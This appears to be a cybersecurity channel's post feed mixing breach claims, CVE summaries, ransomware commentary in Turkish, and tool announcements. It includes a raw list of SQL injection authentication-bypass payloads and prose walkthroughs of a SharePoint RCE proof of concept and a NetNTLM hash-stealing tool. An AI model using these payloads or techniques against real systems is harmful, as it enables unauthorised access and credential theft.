2 479
Subscribers
No data24 hours
+47 days
+1830 days
Posts Archive
2 479
#cryptography
"Small Public Exponent Brings More: Improved Partial Key Exposure Attacks against RSA", 2024.
]-> https://github.com/fffmath/MSBsOfPrivateKeyAttack
2 479
🚨Data Breach Alert ‼️
🇮🇱Israel - Shin Bet
On October 3, 2024, the pro-Palestinian hacktivist group Handala claims to have hacked Shin Bet, the Israeli security agency, through a complex supply chain attack.
According to Handala, they breached the main server of Shin Bet’s exclusive security system, designed to protect the mobile devices of its officers. This security system is intended to prevent data transmission to companies like Meta and Google, but Handala claims to have installed a Trojan on all Shin Bet officers' phones.
Allegedly, this hack resulted in the theft of over 7 TB of sensitive data, including phone models, IMEIs, mobile numbers, emails, apps, search histories, and geolocation data of approximately 30,000 officers.
Handala has reportedly leaked 46 million rows of data as proof of the hack.
The confirmation or denial of these claims has yet to be verified
2 479
CVE-2024-9313
Severity: High (8.8)
OS: Ubuntu
Target: PAM module
Affected versions: < 0.3.5
In a nutshell, you can enter the name of one user in su|sudo|sshd and enter the password of another and it will work....
This apparently does not concern your home Ubuntu, we are talking about
Authd is an authentication daemon for cloud-based identity providers. It helps ensure the secure management of identity and access for Ubuntu machines anywhere in the world, on desktop and the server. Authd's modular design makes it a versatile authentication service that can integrate with multiple identity providers. MS Entra ID is currently supported and several other identity providers are under active development.https://github.com/ubuntu/authd/security/advisories/GHSA-x5q3-c8rm-w787
2 479
Fake Footage, Real Fear: Korea's Deepfake Epidemic
🎭 Deepfake pornography has become a serious threat to women in South Korea. Over the past three years, many Korean women have suffered psychological trauma from fake nude images.
📱 The issue has sparked widespread protests and led to girls deleting their photos from social media. Most of the deepfake suspects are teenage boys, exacerbating existing gender conflicts.
👮♂️ So far this year, police have arrested 387 people on suspicion of distributing deepfakes, 80% of them teenagers. Experts believe the real scale of the problem is much larger, and existing penalties are not effective enough.
2 479
RCE via Microsoft SharePoint Server 2019
Microsoft SharePoint is a web-based platform for collaboration, document management, and information sharing within organizations that is widely used in corporate environments.
Recently I saw some interesting CVEs that affect this web platform:
CVE-2024-38094
CVE-2024-38024
CVE-2024-38023
In order to successfully operate RCE, several conditions must be met, namely
1) Network access to a vulnerable SharePoint server.
2) Credentials (log/pass) for NTLM authentication + the account must have rights to create files and folders.
To successfully exploit the vulnerability, three scripts are provided: poc_filtered.py, poc_specific.py and poc_sub.py. Now let's briefly discuss the essence and how they work.
All three scripts use NTLM authentication to access the SharePoint API and perform similar actions:
The scripts first authenticate to the SharePoint server using the provided credentials. They then create the necessary folders on the server, such as BusinessDataMetadataCatalog, by sending POST requests to the SharePoint API at /api/web/Folders.
Next, the BDCMetadata.bdcm metadata file is created and loaded, containing the information to execute the vulnerability. The information contains commands to execute various SharePoint methods, such as GetCreatorView, GetDefaultValues, GetFilters , and FindFiltered. These methods allow interaction with SharePoint objects and data, which ultimately allows you to execute arbitrary code.
That is, after running poc_filtered.py, a new folder BusinessDataMetadataCatalog is created, after which the script receives and stores the X-RequestDigest value for further requests. X-RequestDigest is a token that confirms that the request comes from a genuine user. This token is included in the headers of subsequent requests for confirming their authenticity. The script then creates and uploads the BDCMetadata.bdcm metadata file to the created folder. This file contains the data and commands that will be used to execute the vulnerability. Finally, the script sends a specially crafted XML request to the SharePoint API to execute the vulnerable methods, which allows arbitrary code to be executed on the server.
But there is a slight difference between the scripts, namely in the methods used.
1) poc_filtered.py uses the FindFiltered method to interact with SharePoint objects.
2) poc_specific.py uses the FindSpecific method to perform specific tasks and commands.
3) poc_sub.py this script uses the Subscribe method to subscribe to events or actions.
PoC
PoC Video
2 479
Hello everyone! Continuing the topic about NetNTLM hashes, session theft and exploits :))
FakePotato was released the other day, which fixed one super interesting vector of privilege escalation - through wallpaper installation.
Earlier ncc group published a cool article about
how changing wallpaper can lead to a NetNTLM hash leak. There were
quite a few requirements there that limited the attack: Webdav
Redirector, DNS record....
However, decoder.cloud quite
transparently hinted that it had found functionality that allows
changing the privileged user's wallpaper using a special COM object.
"I played with the Desktop Wallpaper and was able to change the desktop background image of Adminstrator"
So we have to show our cards :)
I have posted a tool LeakedWallpaper that allows you to get NetNTLM hashes of ANY user whose session is present on the host. Rights requirements: any.
The method will work without fail until the June fix KB5040434 is installed.
The demo can be found here
2 479
💥 Sql Injection payloads
';#---
admin' or '1'='1
' or '1'='1
" or "1"="1
" or "1"="1"--
" or "1"="1"/*
" or "1"="1"#
" or 1=1
" or 1=1 --
" or 1=1 -
" or 1=1--
" or 1=1/*
" or 1=1#
" or 1=1-
") or "1"="1
") or "1"="1"--
") or "1"="1"/*
") or "1"="1"#
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"/*
") or ("1"="1"#
) or '1`='1-
2 479
Güvenlik Ürünleri Değerlendirmesi Hakkında!
Güvenlik sektöründeki rekabetin yoğunluğu, bir ürünle ilgili olumsuz bir haber çıktığında farklı tarafların farklı tepkiler vermesine neden olmaktadır. Bir güvenlik ürünü ile ilgili olumsuz bir haber paylaşıldığında kimisi ölümüne savunurken, bir diğeri de ölümüne eleştirmeye çalışıyor. Bu durum, ürünün savunucuları ile eleştirmenleri arasında zaman zaman oldukça kızışan tartışmalara yol açabilmektedir.
Aslında, herhangi bir teknolojik ürünün zaman zaman sorunlarla karşılaşması kaçınılmazdır. Bu durum, güvenlik ürünleri için de geçerlidir. Siber tehditlerin sürekli olarak evrimleşmesi, güvenlik çözümlerinin de sürekli güncellenmesini gerektirmektedir. Bu süreçte, bazı açıklar veya zafiyetler ortaya çıkabilir.
Ransomware Vakalarında Karşılaşılanlar:
Ransomware vakalarına müdahale eden bir şirket olarak, sektörün önde gelen birçok güvenlik ürününü yakından tanıma fırsatı bulduk. Palo Alto, Check Point, Sophos, Fortinet, Bitdefender, Trend Micro, Eset ve Kaspersky gibi markaların ürünleriyle birçok vakada karşılaştık. Bu karşılaşmalar, hiçbir ürünün %100 güvenli olmadığını göstermektedir.
Neden Hiçbir Ürün %100 Güvenli Değil?
Siber Tehditlerin Sürekli Değişimi: Ransomware grupları, sürekli olarak yeni saldırı yöntemleri geliştiriyor ve güvenlik çözümlerini aşmaya çalışıyor.
İnsan Hatası: Güvenlik ürünlerinin yanlış konfigürasyonu veya kullanıcı hataları, saldırganlara fırsat vermektedir.
Sıfır Gün Açıkları: Henüz üretici tarafından bilinmeyen ve bu nedenle güvenlik güncellemeleri bulunmayan açıklar, saldırganlar tarafından istismar edilmektedir.
Bir güvenlik ürününü seçerken, tek bir vakaya veya olumsuz habere dayanarak karar vermek doğru olmaz. Önemli olan, ürünün genel performansı, güncelleme sıklığı, teknik destek imkanları ve müşteri geri bildirimleridir.
Peki, nasıl daha güvenli olabiliriz?
Çok Katmanlı Güvenlik: Tek bir güvenlik ürününe güvenmek yerine, farklı güvenlik katmanlarını bir araya getirmek önemlidir.
Düzenli Güncellemeler: Hem işletim sistemlerinin hem de güvenlik ürünlerinin en son sürümlerini kullanmak gerekir.
Yedekleme: Verilerinizi düzenli olarak yedeklemek, ransomware saldırılarının etkilerini en aza indirmeye yardımcı olacaktır.
Kullanıcı Eğitimi: Çalışanların siber güvenlik konusunda bilinçlendirilmesi, insan hatalarının önlenmesi için önemlidir.
Incident Response Planı: Bir saldırı durumunda hızlı ve etkili bir şekilde müdahale edebilmek için önceden bir plan hazırlamak gerekir.
Siber güvenlik, sürekli gelişen ve değişen bir alandır. Hiçbir çözüm %100 güvenli olmasa da, doğru önlemler alarak riskleri önemli ölçüde azaltabilirsiniz.
Bu yazı, genel bir bilgilendirme amaçlı olup, profesyonel bir güvenlik danışmanlığı yerine geçmez.
2 479
RansomHub, 2024 yılında faaliyet göstermeye başlamış bir ransomware-as-a-service (RaaS) grubudur. RaaS modeli, ransomware yazılımını geliştiren ve dağıtan çekirdek bir ekip ile bu yazılımı kullanarak saldırılar düzenleyen iş ortaklarından (affiliate) oluşur. Bu iş modeli, ransomware saldırılarının yayılmasını hızlandırır ve saldırı tekniklerinin daha geniş bir yelpazeye ulaşmasına olanak tanır. RansomHub, bu yapı ile kısa sürede dikkat çekmiştir.
https://drdisklab.com/ransomhub/
2 479
#Ransomhub tarafından ödeme yapıldıktan sonra şifrelenmiş dosyaları çözmek için gönderilen #esxi #decryptor çalışmıyor!
DrDisk Lab olarak, ransomware saldırısına uğrayan bir müşterimizin #Ransomhub tarafından şifrelenen verileri üzerinde kapsamlı bir teknik çalışma gerçekleştirdik. Müşterimiz, Ransomhub’ın sağladığı şifre çözücü yazılımı satın almasına rağmen verilerini kurtaramamış ve büyük bir mağduriyet yaşamıştı. Geliştirdiğimiz özel çözümler sayesinde, müşterimizin verilerinin büyük bir bölümünü başarıyla çözdük ve iş sürekliliğini sağladık. Bu başarı, Ransomhub gibi siber suç örgütlerinin verdiği sözlerin güvenilir olmadığını ve mağdurları daha fazla zarara uğratabileceğini bir kez daha gösterdi.
2 479
🚨🚨🚨 #CyberAttack #Alert 🚨🚨🚨
🇺🇸USA - United States Marshals Service
The hacking group Hunters International claims to have breached the United States Marshals Service.
Allegedly, 386 GB (327,268 files) of data were exfiltrated, including gang files, confidential and top-secret documents, FBI docs, cases, active cases, operations data, electronic surveillance, and more.
Ransom deadline: 30th August 24.
2 479
Sistemlerinizde bu dosyaları aratın. Şayet varsa ya ransomware kurbanı olmuşsunuz ya da olmak üzeresiniz demektir.
Teknik incelemeleri operasyon bitince paylaşırım.
Tüm Ms Server, hyperV sürümlerinde etkilidir. Lateral movement , privilege escalation özelliği sayesinde hızlı aksiyon alabiliyor.
2 479
Çok saygın siber güvenlik firmalarının pentest raporlarından geçer not almış olsanız bile backup geri dönüş senaryonuz yanlış ise maalesef her an bir felakete kurban gidebilirsiniz.
Siber güvenlik testlerinden başarıyla geçmek önemli bir adım olsa da, yedekleme ve geri dönüş senaryolarınız zayıfsa, büyük bir risk altındasınız demektir. Yedeklemelerinizin güvenli bir şekilde saklanması, düzenli olarak test edilmesi ve doğru bir şekilde geri yüklenebilmesi kritik öneme sahiptir. Aksi takdirde, bir felaket anında tüm sistemlerinizin çökmesi ve verilerinizin geri döndürülemez bir şekilde kaybolması gibi ciddi sonuçlarla karşılaşabilirsiniz.
Siber güvenlik stratejilerinde başarılı olmak, yalnızca saldırılara karşı savunma mekanizmalarını güçlendirmekle sınırlı değildir. Etkin bir yedekleme ve geri dönüş senaryosu, sistemlerin bütünlüğünü ve verilerin güvenliğini korumada hayati bir rol oynar. Son yaşanan olaylarda, yedekleme stratejilerinin ne kadar kritik olduğunu bir kez daha gördük. Siber saldırılar sonrasında yedeklerden geri dönüş yapılamıyorsa, tüm güvenlik önlemleri boşa gitmiş demektir. Bu nedenle, yedekleme prosedürlerinin düzenli olarak test edilmesi ve güncellenmesi, her zaman en üst düzeyde öncelik verilmesi gereken bir konudur.
2 479
Yoğunluktan dolayı bir miktar burayı boşladık. Kısa süre sonra kaldığımız yerden devam edeceğiz 🤞🏻
